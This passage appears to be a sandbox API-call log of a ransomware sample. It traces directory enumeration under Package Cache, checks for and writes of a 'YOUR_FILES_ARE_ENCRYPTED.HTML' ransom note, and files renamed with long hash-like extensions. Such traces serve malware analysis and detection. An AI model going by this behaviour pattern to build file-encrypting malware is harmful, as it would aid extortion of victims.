ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x496fe967, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xaf9f1587, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f3e96, dwReserved1=0x6f3de8, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0110.468] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496fd5cd, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x496fe967, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xaf9f1587, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f3e96, dwReserved1=0x6f3de8, cFileName="..", cAlternateFileName="")) returned 1 [0110.468] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496fe967, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xafac82c4, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xafac82c4, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f3e96, dwReserved1=0x6f3de8, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0110.468] StrStrIW (lpFirst="vcRuntimeMinimum_x86", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.468] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86") returned 116 [0110.468] GetProcessHeap () returned 0x600000 [0110.468] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.469] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86" [0110.469] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*" [0110.469] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496fe967, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xafac82c4, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xafac82c4, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63b048, dwReserved1=0x6f3df0, cFileName=".", cAlternateFileName="")) returned 0x6265f8 [0110.469] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496fe967, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xafac82c4, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xafac82c4, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63b048, dwReserved1=0x6f3df0, cFileName="..", cAlternateFileName="")) returned 1 [0110.469] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0b40d00, ftCreationTime.dwHighDateTime=0x1cf3e1e, ftLastAccessTime.dwLowDateTime=0xc0b40d00, ftLastAccessTime.dwHighDateTime=0x1cf3e1e, ftLastWriteTime.dwLowDateTime=0xafb2307f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0xf36be, dwReserved0=0x63b048, dwReserved1=0x6f3df0, cFileName="cab1.cab.8396BADD3288D9FB15CEA45161384FC4D4DFA16042C2B7758A8A04D31CD3ED62", cAlternateFileName="CAB1CA~1.839")) returned 1 [0110.469] StrStrIW (lpFirst="cab1.cab.8396BADD3288D9FB15CEA45161384FC4D4DFA16042C2B7758A8A04D31CD3ED62", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.469] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab.8396BADD3288D9FB15CEA45161384FC4D4DFA16042C2B7758A8A04D31CD3ED62") returned 190 [0110.469] PathFindExtensionW (pszPath="cab1.cab.8396BADD3288D9FB15CEA45161384FC4D4DFA16042C2B7758A8A04D31CD3ED62") returned=".8396BADD3288D9FB15CEA45161384FC4D4DFA16042C2B7758A8A04D31CD3ED62" [0110.469] lstrlenW (lpString=".8396BADD3288D9FB15CEA45161384FC4D4DFA16042C2B7758A8A04D31CD3ED62") returned 65 [0110.469] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0b40d00, ftCreationTime.dwHighDateTime=0x1cf3e1e, ftLastAccessTime.dwLowDateTime=0xc0b40d00, ftLastAccessTime.dwHighDateTime=0x1cf3e1e, ftLastWriteTime.dwLowDateTime=0xc0b40d00, ftLastWriteTime.dwHighDateTime=0x1cf3e1e, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0x63b048, dwReserved1=0x6f3df0, cFileName="vc_runtimeMinimum_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0110.469] StrStrIW (lpFirst="vc_runtimeMinimum_x86.msi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.469] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 142 [0110.469] PathFindExtensionW (pszPath="vc_runtimeMinimum_x86.msi") returned=".msi" [0110.469] lstrlenW (lpString=".msi") returned 4 [0110.469] PathFindExtensionW (pszPath="vc_runtimeMinimum_x86.msi") returned=".msi" [0110.469] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf9e1804, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf9e1804, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf9eb842, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63b048, dwReserved1=0x6f3df0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.469] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf9e1804, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf9e1804, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf9eb842, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63b048, dwReserved1=0x6f3df0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.469] FindClose (in: hFindFile=0x6265f8 | out: hFindFile=0x6265f8) returned 1 [0110.469] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 146 [0110.470] GetProcessHeap () returned 0x600000 [0110.470] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.470] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.470] GetProcessHeap () returned 0x600000 [0110.470] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.470] GetProcessHeap () returned 0x600000 [0110.470] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.471] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf9f1587, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf9f1587, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf9f773b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f3e96, dwReserved1=0x6f3de8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.471] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf9f1587, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf9f1587, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf9f773b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f3e96, dwReserved1=0x6f3de8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.471] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0110.471] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0110.471] GetProcessHeap () returned 0x600000 [0110.471] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.471] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.471] GetProcessHeap () returned 0x600000 [0110.471] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.471] GetProcessHeap () returned 0x600000 [0110.471] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.472] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf9fc5be, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf9fc5be, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xafa0133e, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.472] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf9fc5be, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf9fc5be, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xafa0133e, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.472] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0110.472] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0110.472] GetProcessHeap () returned 0x600000 [0110.472] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0110.473] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.473] GetProcessHeap () returned 0x600000 [0110.473] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0110.473] GetProcessHeap () returned 0x600000 [0110.473] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0110.474] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6502f6da, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x6502f6da, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x6502f6da, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508", cAlternateFileName="{2BC3B~1.285")) returned 1 [0110.474] StrStrIW (lpFirst="{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.474] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508") returned 87 [0110.474] GetProcessHeap () returned 0x600000 [0110.474] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0110.475] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508" [0110.475] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\*" [0110.475] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6502f6da, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x6502f6da, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xafbd71fc, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0110.475] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6502f6da, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x6502f6da, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xafbd71fc, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0110.475] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6502f6da, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x6502f6da, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x6502f6da, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="packages", cAlternateFileName="")) returned 1 [0110.475] StrStrIW (lpFirst="packages", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.475] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages") returned 96 [0110.475] GetProcessHeap () returned 0x600000 [0110.475] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.476] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages" [0110.476] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\*" [0110.476] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6502f6da, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x6502f6da, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xafbcc19a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f4198, dwReserved1=0x6f40e8, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0110.476] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6502f6da, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x6502f6da, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xafbcc19a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f4198, dwReserved1=0x6f40e8, cFileName="..", cAlternateFileName="")) returned 1 [0110.476] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6502f6da, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xafb3cbf2, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xafb3cbf2, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f4198, dwReserved1=0x6f40e8, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0110.476] StrStrIW (lpFirst="vcRuntimeMinimum_x86", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.476] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86") returned 117 [0110.476] GetProcessHeap () returned 0x600000 [0110.476] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.477] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86" [0110.477] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\*" [0110.477] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6502f6da, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xafb3cbf2, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xafb3cbf2, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63bee8, dwReserved1=0x6f40f0, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0110.477] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6502f6da, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xafb3cbf2, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xafb3cbf2, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63bee8, dwReserved1=0x6f40f0, cFileName="..", cAlternateFileName="")) returned 1 [0110.477] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb21afe00, ftCreationTime.dwHighDateTime=0x1d5c5ba, ftLastAccessTime.dwLowDateTime=0xb21afe00, ftLastAccessTime.dwHighDateTime=0x1d5c5ba, ftLastWriteTime.dwLowDateTime=0xafc6a03d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x14de75, dwReserved0=0x63bee8, dwReserved1=0x6f40f0, cFileName="cab1.cab.E01FDA55BBDCED16BDE9F8CF62CBB915E0E79FD1D7F1623E421FAED1FFB1D436", cAlternateFileName="CAB1CA~1.E01")) returned 1 [0110.477] StrStrIW (lpFirst="cab1.cab.E01FDA55BBDCED16BDE9F8CF62CBB915E0E79FD1D7F1623E421FAED1FFB1D436", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.477] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\cab1.cab.E01FDA55BBDCED16BDE9F8CF62CBB915E0E79FD1D7F1623E421FAED1FFB1D436") returned 191 [0110.478] PathFindExtensionW (pszPath="cab1.cab.E01FDA55BBDCED16BDE9F8CF62CBB915E0E79FD1D7F1623E421FAED1FFB1D436") returned=".E01FDA55BBDCED16BDE9F8CF62CBB915E0E79FD1D7F1623E421FAED1FFB1D436" [0110.478] lstrlenW 